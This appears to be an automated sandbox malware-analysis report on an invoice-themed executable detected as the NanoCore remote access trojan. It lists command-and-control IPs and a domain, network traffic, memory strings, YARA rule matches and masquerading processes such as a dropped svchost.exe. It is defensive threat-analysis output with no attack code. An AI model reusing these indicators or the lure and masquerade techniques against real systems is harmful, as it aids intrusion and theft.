        Source: Binary string: System.Windows.Forms.pdb{ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 00000011.00000003.772013885.0000000004AC2000.00000004.00000040.sdmp
        Source: Binary string: wuser32.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.ni.pdb source: WerFault.exe, 00000011.00000003.772873228.0000000004B08000.00000004.00000001.sdmp
        Source: Binary string: ws2_32.pdbA source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: crypt32.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: edputil.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: global traffic | TCP traffic: 192.168.2.4:49730 -> 185.157.161.86:50005
        Source: global traffic | TCP traffic: 192.168.2.4:49742 -> 157.97.120.21:50005
        Source: global traffic | HTTP traffic detected: GET /base/F5B9A7CB87ADE6C09DC3687F02604706.html HTTP/1.1 Host: coroloboxorozor.com Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET /base/7A885C86AF3E7CAEF5D9FC154830C30E.html HTTP/1.1 Host: coroloboxorozor.com
        Source: global traffic | HTTP traffic detected: GET /base/88756E9935B1A5EAEE811D9BDFD69574.html HTTP/1.1 Host: coroloboxorozor.com
        Source: Joe Sandbox View | IP Address: 172.67.172.17
        Source: Joe Sandbox View | IP Address: 185.157.161.86
        Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknown | DNS traffic detected: queries for: coroloboxorozor.com
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.857832068.0000000002EE1000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.935499010.00000000031E1000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.934160270.0000000002921000.00000004.00000001.sdmp | String found in binary or memory: http://coroloboxorozor.com
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.857832068.0000000002EE1000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.935499010.00000000031E1000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.934160270.0000000002921000.00000004.00000001.sdmp | String found in binary or memory: http://coroloboxorozor.com/base/88756E9935B1A5EAEE811D9BDFD69574.html
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.857832068.0000000002EE1000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.935499010.00000000031E1000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.934160270.0000000002921000.00000004.00000001.sdmp | String found in binary or memory: http://coroloboxorozor.com/base/F5B9A7CB87ADE6C09DC3687F02604706.html
        Source: powershell.exe, 00000005.00000003.877512223.0000000009A1C000.00000004.00000001.sdmp | String found in binary or memory: http://crl.micr
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.sectigo.com0
        Source: powershell.exe, 00000001.00000003.754942808.0000000009871000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000005.00000002.940071314.000000000501F000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
        Source: WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
        Source: WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
        Source: WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
        Source: WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
        Source: WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
        Source: WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.857832068.0000000002EE1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.938217593.0000000004EE1000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.935499010.00000000031E1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.934160270.0000000002921000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
        Source: WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
        Source: WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
        Source: WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
        Source: WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
        Source: WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
        Source: WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
        Source: powershell.exe, 00000005.00000002.940071314.000000000501F000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: powershell.exe, 00000001.00000003.754942808.0000000009871000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: AdvancedRun.exe, AdvancedRun.exe, 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmp | String found in binary or memory: http://www.nirsoft.net/
        Source: powershell.exe, 00000001.00000003.754942808.0000000009871000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000001.00000003.748547781.0000000005A2C000.00000004.00000001.sdmp | String found in binary or memory: https://go.microd:
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmp | String found in binary or memory: https://sectigo.com/CPS0C
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmp | String found in binary or memory: https://sectigo.com/CPS0D
        Source: CasPol.exe, 0000000D.00000002.945545205.0000000003B39000.00000004.00000001.sdmp | Binary or memory string: RegisterRawInputDevices

        E-Banking Fraud:

        Yara detected Nanocore RAT
        Source: Yara match | File source: 0000000D.00000002.939634194.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000D.00000002.945545205.0000000003B39000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287994.exe PID: 2016, type: MEMORY
        Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 4228, type: MEMORY
        Source: Yara match | File source: Process Memory Space: svchost.exe PID: 4184, type: MEMORY
        Source: Yara match | File source: 13.2.CasPol.exe.3b3ff84.2.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 13.2.CasPol.exe.3b3ff84.2.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 13.2.CasPol.exe.51c0000.7.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 13.2.CasPol.exe.51c4629.8.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 13.2.CasPol.exe.51c0000.7.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 13.2.CasPol.exe.3b445ad.4.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 19.2.svchost.exe.6a98540.11.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 19.2.svchost.exe.6a65720.10.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 12.2.svchost.exe.458a9c0.7.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 13.2.CasPol.exe.3b3b14e.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 12.2.svchost.exe.45bd7e0.8.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 12.2.svchost.exe.458a9c0.7.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 19.2.svchost.exe.6a65720.10.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 12.2.svchost.exe.45bd7e0.8.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 19.2.svchost.exe.6a98540.11.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.raw.unpack, type: UNPACKEDPE

        System Summary:

        Malicious sample detected (through community Yara rule)
        Source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000D.00000002.945545205.0000000003B39000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000D.00000002.949065366.0000000004EE0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287994.exe PID: 2016, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287994.exe PID: 2016, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: CasPol.exe PID: 4228, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: CasPol.exe PID: 4228, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: svchost.exe PID: 4184, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: svchost.exe PID: 4184, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 13.2.CasPol.exe.3b3ff84.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 13.2.CasPol.exe.3b3ff84.2.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.CasPol.exe.51c0000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.CasPol.exe.4ee0000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.CasPol.exe.51c4629.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.CasPol.exe.51c0000.7.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.CasPol.exe.3b445ad.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 19.2.svchost.exe.6a98540.11.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 19.2.svchost.exe.6a98540.11.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 19.2.svchost.exe.6a65720.10.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 19.2.svchost.exe.6a65720.10.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.svchost.exe.458a9c0.7.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.svchost.exe.458a9c0.7.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 13.2.CasPol.exe.3b3b14e.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.CasPol.exe.3b3b14e.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.svchost.exe.45bd7e0.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.svchost.exe.45bd7e0.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.svchost.exe.458a9c0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.svchost.exe.458a9c0.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 19.2.svchost.exe.6a65720.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 19.2.svchost.exe.6a65720.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.svchost.exe.45bd7e0.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.svchost.exe.45bd7e0.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 19.2.svchost.exe.6a98540.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 19.2.svchost.exe.6a98540.11.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Executable has a suspicious name (potential lure to open the executable)
        Source: CN-Invoice-XXXXX9808-19011143287994.exeStatic file information: Suspicious name
        Initial sample is a PE file and has a suspicious name
        Source: initial sampleStatic PE information: Filename: CN-Invoice-XXXXX9808-19011143287994.exe
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_08A269B0 NtSetInformationThread,
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_08A27152 NtSetInformationThread,
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeFile created: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_02D1C450
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_02D19BA8
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_08A20040
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_08A29A70
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_08A29338
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_08A28D40
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_08A20011
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_08C40040
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_033C3BB0
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_033C6258
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_033C8198
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_033C9F58
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_033C34D4
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_033C0040
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_03462038
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_03463058
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_034620E8
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0346E548
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_03461B20
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04E0C238
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_033C001E
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_033C4C78
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 12_2_015EC6A8
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 12_2_015EC6A3
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 12_2_015E9BA8
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 12_2_015E1D18
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 12_2_06C20040
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 12_2_06C20021
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 12_2_06C28110
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 12_2_09320040
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 12_2_093255FE
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 12_2_0932562E
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 19_2_00AC0040
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 19_2_00AC0006
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 19_2_00AC8110
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 19_2_00AC7B28
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 19_2_04E4C450
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 19_2_04E49BA8
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 19_2_077C0040
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 19_2_077C0007
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: String function: 0040B550 appears 50 times
        Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2016 -ip 2016
        Source: CN-Invoice-XXXXX9808-19011143287994.exeStatic PE information: invalid certificate
        Source: AdvancedRun.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: AdvancedRun.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: AdvancedRun.exe.12.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: AdvancedRun.exe.12.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: AdvancedRun.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: AdvancedRun.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: CN-Invoice-XXXXX9808-19011143287994.exeBinary or memory string: OriginalFilename vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.848479319.0000000000BF2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameNbTfoyms.exe2 vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.964968440.00000000065B0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.965514873.0000000006600000.00000002.00000001.sdmpBinary or memory string: originalfilename vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.965514873.0000000006600000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPeBraba.dll6 vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmpBinary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs CN-Invoice-XXXXX9808-19011143287994.exe
